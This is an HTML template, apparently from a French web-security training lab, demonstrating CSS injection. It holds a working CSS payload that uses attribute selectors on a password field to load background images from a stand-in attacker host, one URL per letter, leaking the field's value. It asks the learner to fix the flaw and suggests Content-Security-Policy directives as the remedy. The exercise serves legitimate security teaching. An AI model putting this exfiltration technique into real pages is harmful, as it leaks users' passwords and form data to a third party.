{% extends "layout/default.html" %}
{% block title %}CSS Injection{% endblock %}
{% block head %}
{{ super() }}
<style>
  #password[value*="a"]~#a {
    background: url("https://attack.host/a");
  }

  #password[value*="b"]~#b {
    background: url("https://attack.host/b");
  }

  #password[value*="c"]~#c {
    background: url("https://attack.host/c");
  }

  #password[value*="d"]~#d {
    background: url("https://attack.host/d");
  }

  #password[value*="e"]~#e {
    background: url("https://attack.host/e");
  }

  #password[value*="f"]~#f {
    background: url("https://attack.host/f");
  }

  #password[value*="g"]~#g {
    background: url("https://attack.host/g");
  }

  #password[value*="h"]~#h {
    background: url("https://attack.host/h");
  }

  #password[value*="s"]~#s {
    background: url("https://attack.host/s");
  }

  #password[value*="r"]~#r {
    background: url("https://attack.host/r");
  }

  #password[value*="t"]~#t {
    background: url("https://attack.host/t");
  }
</style>
{% endblock %}
{% block content %}
<p>
  Un attaquant a de nouveau réussi à inclure son code dans votre page.
  Cette fois-ci, il réussi à lire les valeurs pré-chargées dans un champ.
</p>
<p>
  Corrigez le problème en modifiant la méthode css-injection dans le fichier unsecure.py
</p>
<form>
  Password: <input type="password" id="password" name="password" value="secret" />
  <input id="form_submit" type="submit" value="submit" />
  <a id="s"></a>
  <a id="e"></a>
  <a id="c"></a>
  <a id="r"></a>
  <a id="t"></a>
</form>
<p>
  Ressources:
<ul>
  <li><a href="https://developer.mozilla.org/fr/docs/Web/CSS/Attribute_selectors">MDN Attribute_selectors</a></li>
  <li><a href="https://developer.mozilla.org/fr/docs/Web/HTTP/Headers/Content-Security-Policy/style-src">"CSP:
      style-src" sur MDN</a></li>
</ul>
</p>
{{ macro.solution("""
Plusieurs directives CSP peuvent être utilisées conjointement:
<ul>
  <li><strong>style-src</strong>: il convient de spécifier les urls de confiance, les nonces ou les hashes des feuilles
    de style</li>
  <li><strong>img-src</strong> et <strong>media-src</strong>: de même, il est nécessaire de lister les médias à utiliser
  </li>
</ul>
""")}}
{% endblock %}